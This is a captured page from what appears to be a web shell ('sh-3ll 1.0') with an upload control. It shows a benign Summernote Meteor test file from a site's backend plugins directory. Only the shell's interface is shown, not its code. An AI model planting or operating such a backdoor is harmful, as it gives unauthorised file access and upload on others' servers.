HOME


sh-3ll 1.0
DIR:/proc/self/cwd/assets/backend/plugins/summernote/meteor/
Upload File :
Current File : //proc/self/cwd/assets/backend/plugins/summernote/meteor/test.js
'use strict';

Tinytest.add('Instantiation', function (test) {
  var editor = document.createElement('div');
  document.body.appendChild(editor);
  $(editor).summernote();

  test.equal(typeof $(editor).code(), 'string', 'Instantiation');
});